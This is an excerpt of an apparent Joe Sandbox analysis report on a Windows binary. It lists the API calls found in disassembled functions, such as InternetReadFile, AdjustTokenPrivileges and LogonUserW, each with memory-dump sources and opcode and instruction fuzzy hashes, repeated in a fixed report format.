                                                              • Opcode Fuzzy Hash: 5c629ad4957add2e37f4c9d3673c47e832ebd624338ed106ce3c9fbc843c9d3b
                                                              • Instruction Fuzzy Hash: 1D51BE71508301AFD310EF20DC82EABB7E8EF98710F40482DF595972A1EB74E948DB92
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID:
                                                              • API String ID: 3964851224-0
                                                              • Opcode ID: 8ba7af610066dc65d4067e35ee4813f9a574df0bf7ec339e692e51ff5af87393
                                                              • Instruction ID: 0200f4538efc2807eb8bdcc485e4e8a8ac4e0d0642930813989368e26091deb1
                                                              • Opcode Fuzzy Hash: 8ba7af610066dc65d4067e35ee4813f9a574df0bf7ec339e692e51ff5af87393
                                                              • Instruction Fuzzy Hash: 77929071A083519FD710DF14C480B6ABBE1BF85314F14892DF9898B352DB75EC89EB92
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F6E628
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: lstrlen
                                                              • String ID: ($|
                                                              • API String ID: 1659193697-1631851259
                                                              • Opcode ID: 21432eab50de38f3922f13fa8bef0191184a4f876b2f29ef4831a8cec7d9e002
                                                              • Instruction ID: aefa5fdddc75b1fa9460ef7d7505b96710463cb2dde5d55b66b78aa008e6ce84
                                                              • Opcode Fuzzy Hash: 21432eab50de38f3922f13fa8bef0191184a4f876b2f29ef4831a8cec7d9e002
                                                              • Instruction Fuzzy Hash: 24323879A007059FDB28CF59C481A6AB7F1FF48320B15C56EE89ADB3A1D770E941DB40
                                                              APIs
                                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F8180A,00000000), ref: 00F823E1
                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F82418
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                              • String ID:
                                                              • API String ID: 599397726-0
                                                              • Opcode ID: dc0915c027b3d6b70f5b355df093a4cd4b532ec1767d8f2283b10875ff7d50a8
                                                              • Instruction ID: b2796e4464ca2c5c838d38158e3686e0b0abcc2565e5a0682e8e9eaa7d406f7e
                                                              • Opcode Fuzzy Hash: dc0915c027b3d6b70f5b355df093a4cd4b532ec1767d8f2283b10875ff7d50a8
                                                              • Instruction Fuzzy Hash: 8441D472A04209BFEB50EE95DC85FFBB7ACEB40724F10402AFA05A6141DA75BE41B760
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 00F7B40B
                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F7B465
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00F7B4B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$DiskFreeSpace
                                                              • String ID:
                                                              • API String ID: 1682464887-0
                                                              • Opcode ID: dec17fa4444d7e46aceaabbcf01bd662a717a4589ae57a071c7041a7ffd1a700
                                                              • Instruction ID: 1d3ba446c1f41ccf774f5f2048b752054aee6b50d18baaa181e5b9ab06a898bf
                                                              • Opcode Fuzzy Hash: dec17fa4444d7e46aceaabbcf01bd662a717a4589ae57a071c7041a7ffd1a700
                                                              • Instruction Fuzzy Hash: 39215E35A00108EFCB00EFA5DC85AEDBBB8FF49314F1480AAE905EB351CB359955DB51
                                                              APIs
                                                                • Part of subcall function 00F30DB6: std::exception::exception.LIBCMT ref: 00F30DEC
                                                                • Part of subcall function 00F30DB6: __CxxThrowException@8.LIBCMT ref: 00F30E01
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F6882B
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F68858
                                                              • GetLastError.KERNEL32 ref: 00F68865
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                              • String ID:
                                                              • API String ID: 1922334811-0
                                                              • Opcode ID: e24babf17bffce5ebef16b781355ad44626f4fc2ee899ffb6305145a3d035f1d
                                                              • Instruction ID: 9541a9809bd5976a3a679da38958def6fa256d0c1dc822a8c1d2a56447234d9b
                                                              • Opcode Fuzzy Hash: e24babf17bffce5ebef16b781355ad44626f4fc2ee899ffb6305145a3d035f1d
                                                              • Instruction Fuzzy Hash: 4411BFB2804205AFE718DFA4DC85D2BB7FCEB44320B20862EF45583211EF70BC419B60
                                                              APIs
                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00F68774
                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F6878B
                                                              • FreeSid.ADVAPI32(?), ref: 00F6879B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                              • String ID:
                                                              • API String ID: 3429775523-0
                                                              • Opcode ID: fe7444e3012b67311c5a715d4f7cba1dc4483c56ff8ae0ebe10e48284fe8db82
                                                              • Instruction ID: 9fde0c3e3698a7d4e244747266859da4f0974bdc37cb105af4268914f857c21c
                                                              • Opcode Fuzzy Hash: fe7444e3012b67311c5a715d4f7cba1dc4483c56ff8ae0ebe10e48284fe8db82
                                                              • Instruction Fuzzy Hash: 2CF04975E1130CBFDF00DFF4DC89AAEBBBCEF08311F1045A9A901E2191E6716A089B50
                                                              APIs
                                                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00F74CB3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: mouse_event
                                                              • String ID: DOWN
                                                              • API String ID: 2434400541-711622031
                                                              • Opcode ID: 12d4acf5c655e173d3f9fddaf08e424d70096cf85236d60c219a1252d7d63ca7
                                                              • Instruction ID: 5e9389a2b6e7d281f4092b4dee36a42b087fa606ac8299c26d7463dcee6757e7
                                                              • Opcode Fuzzy Hash: 12d4acf5c655e173d3f9fddaf08e424d70096cf85236d60c219a1252d7d63ca7
                                                              • Instruction Fuzzy Hash: 33E0467229972238A9452A58BD03EB7228C8B12331B12420BF818E54C1EE887C8274BA
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00F7C6FB
                                                              • FindClose.KERNEL32(00000000), ref: 00F7C72B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: 1b7109b0b9acc138f0105b12e022d85c0b7638d1c521aaa3cd2808f33bdded3d
                                                              • Instruction ID: 63535c30619686275f4059742dac24310b1cebcd5af60134d4c26a6c69a32b46
                                                              • Opcode Fuzzy Hash: 1b7109b0b9acc138f0105b12e022d85c0b7638d1c521aaa3cd2808f33bdded3d
                                                              • Instruction Fuzzy Hash: 1D117C726042049FDB10AF29DC55A6AB7E8EF85334F04851EF8AAC7290DB74A805DB81
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00F89468,?,00F9FB84,?), ref: 00F7A097
                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00F89468,?,00F9FB84,?), ref: 00F7A0A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: cf3e3fcecb920f739e400042f788be24ca425e260b1cd6b2a6bea55e2255ef53
                                                              • Instruction ID: a33a46549eab30381e5637277afe47fcb8f241926e1e75f4c19ff767ed5d4385
                                                              • Opcode Fuzzy Hash: cf3e3fcecb920f739e400042f788be24ca425e260b1cd6b2a6bea55e2255ef53
                                                              • Instruction Fuzzy Hash: 43F0A73650522DBBDB21AFA4DC48FEE776CFF08361F008166F909D7181DA309944EBA2
                                                              APIs
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F68309), ref: 00F681E0
                                                              • CloseHandle.KERNEL32(?,?,00F68309), ref: 00F681F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                              • String ID:
                                                              • API String ID: 81990902-0
                                                              • Opcode ID: f70a02230ec3dfcd1ae421f523a118dbf904482609868bc6f4de833f48392485
                                                              • Instruction ID: 0f660ea6ab46388c3d01e9ad5bf832d6073be99d717305e23122045f74314df2
                                                              • Opcode Fuzzy Hash: f70a02230ec3dfcd1ae421f523a118dbf904482609868bc6f4de833f48392485
                                                              • Instruction Fuzzy Hash: 1BE0E671010511AFE7252B70FC09D7777EDEF04360B14892EF465C4470DB665C91EB10
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00F38D57,?,?,?,00000001), ref: 00F3A15A
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00F3A163
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 20f6c18557bc51abb8e51f6cfd5573915108da9e94d5df28d54c5fcdb159670e
                                                              • Instruction ID: ecfdf239b19dd2293a3a70d1e2336ec2629cbb70fa95a2786d9b3ffae9fe3b5d
                                                              • Opcode Fuzzy Hash: 20f6c18557bc51abb8e51f6cfd5573915108da9e94d5df28d54c5fcdb159670e
                                                              • Instruction Fuzzy Hash: 07B0923105420CEBCA002BA1EC09F883F68EB44BA2F404022F70DC4060CB6654A4AA91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6a714deea6d2b6e1214343ad38334dfe94df24c5cc20bca7fefb595b485bf90b
                                                              • Instruction ID: edd533572ae1a56d7c699d37cb238db5743e4148011ab859588ee41539d2d968
                                                              • Opcode Fuzzy Hash: 6a714deea6d2b6e1214343ad38334dfe94df24c5cc20bca7fefb595b485bf90b
                                                              • Instruction Fuzzy Hash: C63228A2D29F054DD7239634DC72335A248AFB73E4F15D737F81AB5AA9EB28C4836100
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b16760a6be44cbd562be9864e9bad551b8dde91b718604572e272fb2061837a9
                                                              • Instruction ID: b2bb9379e84c22afc4c711d19781f368d3d7880cd7a6b860621cb969445f4d49
                                                              • Opcode Fuzzy Hash: b16760a6be44cbd562be9864e9bad551b8dde91b718604572e272fb2061837a9
                                                              • Instruction Fuzzy Hash: F2B10160D2AF444DD76396388831336BA5CAFBB2D5F91D71BFC2670D22EB228583A141
                                                              APIs
                                                              • __time64.LIBCMT ref: 00F7889B
                                                                • Part of subcall function 00F3520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00F78F6E,00000000,?,?,?,?,00F7911F,00000000,?), ref: 00F35213
                                                                • Part of subcall function 00F3520A: __aulldiv.LIBCMT ref: 00F35233
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                              • String ID:
                                                              • API String ID: 2893107130-0
                                                              • Opcode ID: 323029e10544c1f8dd920bc68307c565902afca566d90bc23e8b40bf08b22ba2
                                                              • Instruction ID: 301c7eff74aa7ddee0ba8323764537f97cb39d338d21f2fc66c26978782cc7dd
                                                              • Opcode Fuzzy Hash: 323029e10544c1f8dd920bc68307c565902afca566d90bc23e8b40bf08b22ba2
                                                              • Instruction Fuzzy Hash: CF21A232A355108BC729CF35D841B52B3E1EBA5321B688E6DD1F9CB2C0CA34A945DB54
                                                              APIs
                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00F68389), ref: 00F687D1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: LogonUser
                                                              • String ID:
                                                              • API String ID: 1244722697-0
                                                              • Opcode ID: f88773fdf67875ff0b7719a63d08d0e3ba8a84b7e0caf4ad5df30c075040692b
                                                              • Instruction ID: beb6a5af42ed8b85e8c6125c49ce037cfb4836cc01689289c41a20bb925254eb
                                                              • Opcode Fuzzy Hash: f88773fdf67875ff0b7719a63d08d0e3ba8a84b7e0caf4ad5df30c075040692b
                                                              • Instruction Fuzzy Hash: 6CD05E3226450EABEF018FA4DC01EAE3B69EB04B01F408111FE15C50A1C776D835AB60
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00F3A12A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: d308508e9f6ab3ad489e7784ace4fd5bdc55d5ac322fde272399083acef12194
                                                              • Instruction ID: 1fdd934bb47c2a4ba1e6551c57643c5ea14a6fea9d58fa720985fd986e102b7d
                                                              • Opcode Fuzzy Hash: d308508e9f6ab3ad489e7784ace4fd5bdc55d5ac322fde272399083acef12194
                                                              • Instruction Fuzzy Hash: 63A0123000010CE78A001B51EC048447F5CD6001907004021F50C80021873254505580
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ec7b7da6ee8bcee08a38ddfbc0ca123f6a4ce958daf8ac1a6d77cc260b8e89bf
                                                              • Instruction ID: aa19c7116b087b230a948fafe8db07b17afe49da2620f1906b3585d0af7e8f92
                                                              • Opcode Fuzzy Hash: ec7b7da6ee8bcee08a38ddfbc0ca123f6a4ce958daf8ac1a6d77cc260b8e89bf
                                                              • Instruction Fuzzy Hash: 0C225431D05166DBDF288B24E59077C77A1FB01BA4F28806AD842DB592DF38ADD2FB41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
